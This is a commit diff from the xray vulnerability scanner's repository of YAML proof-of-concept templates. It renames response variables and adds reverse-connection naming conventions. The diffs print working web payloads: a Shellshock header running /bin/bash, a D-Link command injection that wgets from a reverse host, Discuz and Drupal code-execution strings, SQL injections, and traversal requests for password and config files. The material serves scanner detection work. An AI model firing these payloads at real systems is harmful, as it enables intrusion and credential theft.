New poc vars (#539)

chaitin · Nov 7, 2019 · 4e22319 · 4e22319
1 parent 17fbb5d
commit 4e22319
Show file tree

Hide file tree

Showing 100 changed files with 339 additions and 235 deletions.
diff --git a/docs/guide/high_quality_poc.md b/docs/guide/high_quality_poc.md
@@ -4,8 +4,8 @@
 
 1. 无特殊情况不要在payload中出现你的用户名或者xray等字样，能随机的都随机。可以参考 poc 语法的文档。目前可能有以下例外需要注意下
  - updatexml 报错，如果参数是`md5(randvalue)` 报错页面的md5数据不一定完整，暂时可以使用固定值代替。
-1. 不要直接使用如`status == 200`这样判断status code验证漏洞，一定存在误报。
-1. 不要直接使用如`body.bcontains(b'upload success')`这样检测一个英文单词的方式来验证漏洞，一定存在误报。
+1. 不要直接使用如`reponse.status == 200`这样判断status code验证漏洞，一定存在误报。
+1. 不要直接使用如`response.body.bcontains(b'upload success')`这样检测一个英文单词的方式来验证漏洞，一定存在误报。
 1. 测试RCE类漏洞，请不要使用`echo`、`print`、`var_dump`之类的输出语句直接输出一个内容，然后在返回里查找这个内容，此类POC很容易误报和漏报，原因如下：
   - 如果对方页面本身是一个类似phpinfo的调试页面，会将你的数据包细节完全打印出来，那么并不能证明存在命令执行漏洞
   - 如果对方安装了xdebug等调试类扩展，`var_dump`等函数输出可能存在差异导致查找不成功
@@ -17,7 +17,7 @@
     path: /admin/?a=Factory();printf('{{r1}}');//../
     follow_redirects: false
     expression: |
-      status == 200 && body.bcontains(bytes(r1))
+      response.status == 200 && response.body.bcontains(bytes(r1))
   ```
 1.  测试RCE类漏洞，如PHP代码执行，请不要使用`system`、`shell_exec`、`phpinfo`等函数测试漏洞，容易出现误报和漏报，原因如下：
   - 如果对方本身就是一个phpinfo页面，无法判断是否是成功执行了代码，导致出现误报
@@ -50,6 +50,11 @@
     r1: randomInt(800000000, 1000000000)
     r2: randomInt(800000000, 1000000000)
   ```
+1. 自定义变量名做部分约定。简单来讲，反连平台都使用 reverse 作为变量名，其他变量名使用驼峰式命名：
+  - `reverse: newReverse`
+  - `reverseURL: reverse.url`
+  - `reverseDomain: reverse.domain`
+  - `reverseIP: reverse.ip`
 
 1. 关于POC的编写其他的注意点，推荐参考这篇文章：<https://paper.seebug.org/9/>
 
@@ -64,7 +69,7 @@ rules:
   - method: GET
     headers:
       User-Agent: "() { :; }; echo; echo; /bin/bash -c 'expr {{r1}} + {{r2}}'"
-    expression: body.bcontains(bytes(string(r1+r2)))
+    expression: response.body.bcontains(bytes(string(r1+r2)))
 detail:
   author: example(https://github.com/example)
   links:

diff --git a/docs/guide/poc.md b/docs/guide/poc.md
diff --git a/pocs/activemq-cve-2016-3088.yml b/pocs/activemq-cve-2016-3088.yml
@@ -8,26 +8,26 @@ rules:
     body: |
       {{fileContent}}
     expression: |
-      status==204
+      response.status==204
   - method: GET
     path: /admin/test/index.jsp
     search: |
       activemq.home=(?P<home>.*?),
     follow_redirects: false
     expression: |
-      status==200
+      response.status==200
   - method: MOVE
     path: /fileserver/{{filename}}.txt
     headers:
       Destination: "file://{{home}}/webapps/api/{{filename}}.jsp"
     follow_redirects: false
     expression: |
-      status==204
+      response.status==204
   - method: GET
     path: /api/{{filename}}.jsp
     follow_redirects: false
     expression: |
-      status==200 && body.bcontains(bytes(fileContent))
+      response.status==200 && response.body.bcontains(bytes(fileContent))
 detail:
   author: j4ckzh0u(https://github.com/j4ckzh0u)
   links:

diff --git a/pocs/bash-cve-2014-6271.yml b/pocs/bash-cve-2014-6271.yml
@@ -7,7 +7,7 @@ rules:
     headers:
       User-Agent: "() { :; }; echo; echo; /bin/bash -c 'expr {{r1}} + {{r2}}'"
     follow_redirects: false
-    expression: body.bcontains(bytes(string(r1+r2)))
+    expression: response.body.bcontains(bytes(string(r1+r2)))
 detail:
   author: neal1991(https://github.com/neal1991)
   links:

diff --git a/pocs/cacti-weathermap-file-write.yml b/pocs/cacti-weathermap-file-write.yml
@@ -4,11 +4,11 @@ rules:
     path: >-
       /plugins/weathermap/editor.php?plug=0&mapname=test.php&action=set_map_properties&param=&param2=&debug=existing&node_name=&node_x=&node_y=&node_new_name=&node_label=&node_infourl=&node_hover=&node_iconfilename=--NONE--&link_name=&link_bandwidth_in=&link_bandwidth_out=&link_target=&link_width=&link_infourl=&link_hover=&map_title=46ea1712d4b13b55b3f680cc5b8b54e8&map_legend=Traffic+Load&map_stamp=Created:+%b+%d+%Y+%H:%M:%S&map_linkdefaultwidth=7
     follow_redirects: false
-    expression: status == 200
+    expression: response.status == 200
   - method: GET
     path: /plugins/weathermap/configs/test.php
     follow_redirects: false
-    expression: status==200 && body.bcontains(b'46ea1712d4b13b55b3f680cc5b8b54e8')
+    expression: response.status==200 && response.body.bcontains(b'46ea1712d4b13b55b3f680cc5b8b54e8')
 detail:
   author: whynot(https://github.com/notwhy)
   links:

diff --git a/pocs/coldfusion-cve-2010-2861-lfi.yml b/pocs/coldfusion-cve-2010-2861-lfi.yml
@@ -5,7 +5,7 @@ rules:
       /CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en
     follow_redirects: true
     expression: |
-      status==200 && body.bcontains(b'rdspassword=') && body.bcontains(b'encrypted=')
+      response.status==200 && response.body.bcontains(b'rdspassword=') && response.body.bcontains(b'encrypted=')
 detail:
   version: 8.0, 8.0.1, 9.0, 9.0.1 and earlier versions
   author: sharecast

diff --git a/pocs/confluence-cve-2015-8399.yml b/pocs/confluence-cve-2015-8399.yml
@@ -3,7 +3,7 @@ rules:
   - method: GET
     path: /spaces/viewdefaultdecorator.action?decoratorName
     follow_redirects: false
-    expression: status==200 && body.bcontains(b'confluence-init.properties') && body.bcontains(b'View Default Decorator')
+    expression: response.status==200 && response.body.bcontains(b'confluence-init.properties') && response.body.bcontains(b'View Default Decorator')
 detail:
   author: whynot(https://github.com/notwhy)
   links:

diff --git a/pocs/confluence-cve-2019-3396-lfi.yml b/pocs/confluence-cve-2019-3396-lfi.yml
@@ -10,7 +10,7 @@ rules:
       {"contentId":"786458","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/test","width":"1000","height":"1000","_template":"../web.xml"}}}
     follow_redirects: true
     expression: |
-      status==200 && body.bcontains(b'<param-name>contextConfigLocation</param-name>')
+      response.status==200 && response.body.bcontains(b'<param-name>contextConfigLocation</param-name>')
 detail:
   author: sharecast
   links:

diff --git a/pocs/coremail-cnvd-2019-16798.yml b/pocs/coremail-cnvd-2019-16798.yml
@@ -5,7 +5,7 @@ rules:
       /mailsms/s?func=ADMIN:appState&dumpConfig=/
     follow_redirects: false
     expression: >
-      status==200 && body.bcontains(b'<object name="cm_md_db">')
+      response.status==200 && response.body.bcontains(b'<object name="cm_md_db">')
 detail:
   author: cc_ci(https://github.com/cc8ci)
   links:

diff --git a/pocs/couchdb-cve-2017-12635.yml b/pocs/couchdb-cve-2017-12635.yml
@@ -17,7 +17,7 @@ rules:
       }
     follow_redirects: false
     expression: |
-      status==201
+      response.status==201
 detail:
   author: j4ckzh0u(https://github.com/j4ckzh0u)
   links:

diff --git a/pocs/couchdb-unauth.yml b/pocs/couchdb-unauth.yml
@@ -4,9 +4,9 @@ rules:
     path: /_config
     follow_redirects: false
     expression: >
-      status == 200 && body.bcontains(b'httpd_design_handlers') &&
-      body.bcontains(b'external_manager') &&
-      body.bcontains(b'replicator_manager')
+      response.status == 200 && response.body.bcontains(b'httpd_design_handlers') &&
+      response.body.bcontains(b'external_manager') &&
+      response.body.bcontains(b'replicator_manager')
 detail:
   author: FiveAourThe(https://github.com/FiveAourThe)
   links:

diff --git a/pocs/dedecms-url-redirection.yml b/pocs/dedecms-url-redirection.yml
@@ -5,7 +5,7 @@ rules:
       /plus/download.php?open=1&link=aHR0cHM6Ly93d3cuZHUxeDNyMTIuY29t
     follow_redirects: false
     expression: >
-      status==302 && headers['location']=="https://www.du1x3r12.com"
+      response.status==302 && response.headers['location']=="https://www.du1x3r12.com"
 detail:
   author: cc_ci(https://github.com/cc8ci)
   Affected Version: "V5.7 sp1"

diff --git a/pocs/discuz-ml3x-cnvd-2019-22239.yml b/pocs/discuz-ml3x-cnvd-2019-22239.yml
@@ -6,15 +6,15 @@ rules:
     path: /forum.php
     follow_redirects: false
     expression: |
-      status==200
+      response.status==200
     search: cookiepre = '(?P<token>[\w_]+)'
   - method: GET
     path: /forum.php
     headers:
       Cookie: "{{token}}language=sc'.print(md5({{r1}})).'"
     follow_redirects: false
     expression: |
-      status == 200 && body.bcontains(bytes(md5(string(r1))))
+      response.status == 200 && response.body.bcontains(bytes(md5(string(r1))))
 detail:
   author: X.Yang
   Discuz_version: Discuz!ML 3.x

diff --git a/pocs/discuz-v7-rce.yml b/pocs/discuz-v7-rce.yml
@@ -9,7 +9,7 @@ rules:
       Cookie: GLOBALS%5B_DCACHE%5D%5Bsmilies%5D%5Bsearcharray%5D=/.*/eui; GLOBALS%5B_DCACHE%5D%5Bsmilies%5D%5Breplacearray%5D=print_r(md5({{rand}}));
     follow_redirects: false
     expression: |
-      status==200 && body.bcontains(bytes(md5(string(rand))))
+      response.status==200 && response.body.bcontains(bytes(md5(string(rand))))
 detail:
   version: Discuz 7.x/6.x
   author: Loneyer

diff --git a/pocs/discuz-v72-sqli.yml b/pocs/discuz-v72-sqli.yml
@@ -5,8 +5,8 @@ rules:
       /faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat((select%20concat(user,0x3a,md5(1234),0x3a)%20from%20mysql.user%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
     follow_redirects: false
     expression: >
-      status==200 && body.bcontains(b'81dc9bdb52d04dc20036dbd8313ed055') &&
-      body.bcontains(b'Discuz! info</b>: MySQL Query Error')
+      response.status==200 && response.body.bcontains(b'81dc9bdb52d04dc20036dbd8313ed055') &&
+      response.body.bcontains(b'Discuz! info</b>: MySQL Query Error')
 detail:
   author: leezp
   Affected Version: "discuz <=v7.2"

diff --git a/pocs/discuz-wechat-plugins-unauth.yml b/pocs/discuz-wechat-plugins-unauth.yml
@@ -4,7 +4,7 @@ rules:
     path: '/plugin.php?id=wechat:wechat&ac=wxregister'
     follow_redirects: false
     expression: |
-      status==302 && 'set-cookie' in headers && headers['set-cookie'].contains('auth') && 'location' in headers && headers['location'].contains('wsq.discuz.com')
+      response.status==302 && 'set-cookie' in response.headers && response.headers['set-cookie'].contains('auth') && 'location' in response.headers && response.headers['location'].contains('wsq.discuz.com')
 detail:
   author: JrD
   links:

diff --git a/pocs/dlink-850l-info-leak.yml b/pocs/dlink-850l-info-leak.yml
@@ -9,7 +9,7 @@ rules:
       <?xml version="1.0" encoding="utf-8"?><postxml><module><service>../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml</service></module></postxml>
     follow_redirects: false
     expression: >
-      status == 200 && body.bcontains(b'</usrid>') && body.bcontains(b'</password>') && body.bcontains(b'<result>OK</result>')
+      response.status == 200 && response.body.bcontains(b'</usrid>') && response.body.bcontains(b'</password>') && response.body.bcontains(b'<result>OK</result>')
 detail:
   author: cc_ci(https://github.com/cc8ci)
   Affected Version: "Dir-850L"

diff --git a/pocs/dlink-cve-2019-16920-rce.yml b/pocs/dlink-cve-2019-16920-rce.yml
@@ -1,14 +1,17 @@
 name: poc-yaml-dlink-cve-2019-16920-rce
+set:
+  reverse: newReverse()
+  reverseURL: reverse.url
 rules:
   - method: POST
     path: /apply_sec.cgi
     headers:
       Content-Type: application/x-www-form-urlencoded
     body: >-
-      html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20{{reverse_url}}
+      html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20{{reverseURL}}
     follow_redirects: true
     expression: |
-      status == 200 && waitReverse(10)
+      response.status == 200 && reverse.wait(10)
 detail:
   author: JingLing(https://hackfun.org/)
   links:

diff --git a/pocs/dlink-cve-2019-17506.yml b/pocs/dlink-cve-2019-17506.yml
@@ -7,7 +7,7 @@ rules:
     body: SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a
     follow_redirects: false
     expression: >
-      status == 200 && body.bcontains(b'<name>') && body.bcontains(b'<password>')
+      response.status == 200 && response.body.bcontains(b'<name>') && response.body.bcontains(b'<password>')
 detail:
   author: l1nk3r,Huasir(https://github.com/dahua966/)
   links:

diff --git a/pocs/docker-api-unauthorized-rce.yml b/pocs/docker-api-unauthorized-rce.yml
@@ -4,7 +4,7 @@ rules:
     path: /info
     follow_redirects: false
     expression: |
-      status==200 && body.bcontains(b'KernelVersion') && body.bcontains(b'RegistryConfig') && body.bcontains(b'DockerRootDir')
+      response.status==200 && response.body.bcontains(b'KernelVersion') && response.body.bcontains(b'RegistryConfig') && response.body.bcontains(b'DockerRootDir')
 
 detail:
   author: j4ckzh0u(https://github.com/j4ckzh0u)

diff --git a/pocs/docker-registry-unauthorized-access.yml b/pocs/docker-registry-unauthorized-access.yml
@@ -4,13 +4,13 @@ rules:
     path: /v2/
     follow_redirects: false
     expression: >
-      status==200 && 'docker-distribution-api-version' in headers && headers['docker-distribution-api-version'].contains('registry/2.0')
+      response.status==200 && 'docker-distribution-api-version' in response.headers && response.headers['docker-distribution-api-version'].contains('registry/2.0')
   - method: GET
     path: /v2/_catalog
     follow_redirects: false
     expression: >
-      status==200 && content_type.contains('application/json') &&
-      body.bcontains(b'repositories')
+      response.status==200 && response.content_type.contains('application/json') &&
+      response.body.bcontains(b'repositories')
 detail:
   author: p0wd3r
   links:

diff --git a/pocs/druid-monitor-unauth.yml b/pocs/druid-monitor-unauth.yml
@@ -3,7 +3,7 @@ rules:
   - method: GET
     path: /druid/index.html
     expression: |
-      status == 200 && body.bcontains(b'Druid Stat Index') && body.bcontains(b'DruidVersion') && body.bcontains(b'DruidDrivers')
+      response.status == 200 && response.body.bcontains(b'Druid Stat Index') && response.body.bcontains(b'DruidVersion') && response.body.bcontains(b'DruidDrivers')
 detail:
   author: met7or
   links:

diff --git a/pocs/drupal-cve-2019-6340.yml b/pocs/drupal-cve-2019-6340.yml
@@ -1,6 +1,6 @@
 name: poc-yaml-drupal-cve-2019-6340
 set:
-  host: parseURL(url)['host']
+  host: request.url.host
   r1: randomLowercase(4)
   r2: randomLowercase(4)
 rules:
@@ -25,7 +25,7 @@ rules:
       }
     follow_redirects: true
     expression: |
-      status==403&&body.bcontains(bytes(r1 + "%" + r2))
+      response.status==403&&response.body.bcontains(bytes(r1 + "%" + r2))
 detail:
   author: thatqier
   links:

diff --git a/pocs/drupal-drupal7geddon2-rce.yml b/pocs/drupal-drupal7geddon2-rce.yml
@@ -12,15 +12,15 @@ rules:
     search: |
       name="form_build_id"\s+value="(?P<build_id>.+?)"
     expression: |
-      status==200
+      response.status==200
   - method: POST
     path: "/?q=file%2Fajax%2Fname%2F%23value%2F{{build_id}}"
     headers:
       Content-Type: application/x-www-form-urlencoded
     body: |
       form_build_id={{build_id}}
     expression: |
-      body.bcontains(bytes(r1+'%'+r2))
+      response.body.bcontains(bytes(r1+'%'+r2))
 detail:
   drupal_version: 7
   links:

diff --git a/pocs/drupal-drupal8geddon2-rce.yml b/pocs/drupal-drupal8geddon2-rce.yml
@@ -10,7 +10,7 @@ rules:
     body: |
       form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=printf&mail[#type]=markup&mail[#markup]={{r1}}%25%25{{r2}}
     expression: |
-      body.bcontains(bytes(r1+'%'+r2))
+      response.body.bcontains(bytes(r1+'%'+r2))
 detail:
   drupal_version: 8
   links:

diff --git a/pocs/drupal-geddon-cve-2014-3704-sqli.yml b/pocs/drupal-geddon-cve-2014-3704-sqli.yml
@@ -7,7 +7,7 @@ rules:
       updatexml(0x23,concat(1,md5(666)),1)%23]=bob&name[0]=a
     follow_redirects: false
     expression: |
-      status == 500 && body.bcontains(b'PDOException') && body.bcontains(b'fae0b27c451c728867a567e8c1bb4e53')
+      response.status == 500 && response.body.bcontains(b'PDOException') && response.body.bcontains(b'fae0b27c451c728867a567e8c1bb4e53')
 detail:
   Affected Version: "Drupal < 7.32"
   links:

diff --git a/pocs/dvr-cve-2018-9995.yml b/pocs/dvr-cve-2018-9995.yml
@@ -7,7 +7,7 @@ rules:
       Cookie: uid=admin
     follow_redirects: true
     expression: >
-      status==200 && body.bcontains(b'"uid":') && body.bcontains(b'playback')
+      response.status==200 && response.body.bcontains(b'"uid":') && response.body.bcontains(b'playback')
 detail:
   author: cc_ci(https://github.com/cc8ci)
   Affected Version: "DVR"

diff --git a/pocs/ecology-filedownload-directory-traversal.yml b/pocs/ecology-filedownload-directory-traversal.yml
@@ -4,7 +4,7 @@ rules:
     path: /weaver/ln.FileDownload?fpath=../ecology/WEB-INF/web.xml
     follow_redirects: false
     expression: |
-      status == 200 && body.bcontains(b'<url-pattern>/weaver/')
+      response.status == 200 && response.body.bcontains(b'<url-pattern>/weaver/')
 detail:
   author: l1nk3r
   links:

diff --git a/pocs/ecology-javabeanshell-rce.yml b/pocs/ecology-javabeanshell-rce.yml
@@ -9,7 +9,7 @@ rules:
       bsh.script=print%28{{r1}}*{{r2}}%29&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw
     follow_redirects: false
     expression: |
-      status==200 && body.bcontains(bytes(string(r1*r2)))
+      response.status==200 && response.body.bcontains(bytes(string(r1*r2)))
 detail:
   author: l1nk3r
   links:

diff --git a/pocs/ecology-springframework-directory-traversal.yml b/pocs/ecology-springframework-directory-traversal.yml
@@ -4,7 +4,7 @@ rules:
     path: /weaver/org.springframework.web.servlet.ResourceServlet?resource=/WEB-INF/web.xml
     follow_redirects: false
     expression: |
-      status == 200 && body.bcontains(b'<url-pattern>/weaver/')
+      response.status == 200 && response.body.bcontains(b'<url-pattern>/weaver/')
 detail:
   author: l1nk3r
   links:

diff --git a/pocs/ecology-workflowcentertreedata-sqli.yml b/pocs/ecology-workflowcentertreedata-sqli.yml
@@ -11,7 +11,7 @@ rules:
       formids=11111111111)))%0a%0dunion%20select%20NULL,concat('{{r1}}','{{r2}}')%20from%20v$parameter%20order%20by%20(((1
     follow_redirects: true
     expression: |
-      status == 200 && body.bcontains(bytes(r1+r2))
+      response.status == 200 && response.body.bcontains(bytes(r1+r2))
 detail:
   author: JingLing(https://hackfun.org/)
   links:

diff --git a/pocs/ecshop-360-rce.yml b/pocs/ecshop-360-rce.yml
@@ -13,7 +13,7 @@ rules:
       Content-Type: application/x-www-form-urlencoded
     body: action=login&vulnspy=printf(r1*r2);
     follow_redirects: false
-    expression: status == 200 && body.bcontains(bytes(string(r1*r2)))
+    expression: response.status == 200 && response.body.bcontains(bytes(string(r1*r2)))
 detail:
   author: githusky
   links: